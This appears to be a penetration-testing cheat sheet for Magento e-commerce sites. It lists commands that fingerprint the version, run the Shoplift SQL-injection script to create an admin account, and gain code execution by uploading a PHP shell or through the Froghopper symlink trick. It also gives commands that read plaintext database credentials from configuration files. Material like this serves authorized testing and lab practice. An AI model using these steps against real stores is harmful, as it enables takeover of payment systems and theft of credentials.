Magento
What it is: E-commerce CMS platform owned by Adobe. Handles payment processing, making it a high-value target. Shoplift and other bugs allow unauthenticated admin access and RCE.
Default ports: 80, 443
Vuln research:
Identify Magento version
Check specific files and headers
curl -s http://$IP/RELEASE_NOTES.txt | head -5
curl -s http://$IP/magento_version
curl -s http://$IP/ | grep "Magento"
# Admin panel usually at: /admin or /index.php/admin
Magento Shoplift (CVE-2015-1397)
SQL injection → Admin access — Magento < 1.9.2.0
python2 shoplift.py http://$IP/
# Creates admin account: forme:forme
Magento authenticated RCE
After admin access — Install malicious package or edit templates
# System → Filesystem → IDE → Edit a PHP file
# Or install a malicious Magento Connect package
# Or use Froghopper attack:
# 1. Admin → Allow symlinks in template settings
# 2. Upload PHP shell as image (via category)
# 3. Create newsletter template with symlink to shell
Magento database credentials
app/etc/local.xml or app/etc/env.php — Plaintext DB creds
cat /var/www/html/app/etc/local.xml | grep -A5 "connection"
cat /var/www/html/app/etc/env.php | grep -A5 "connection"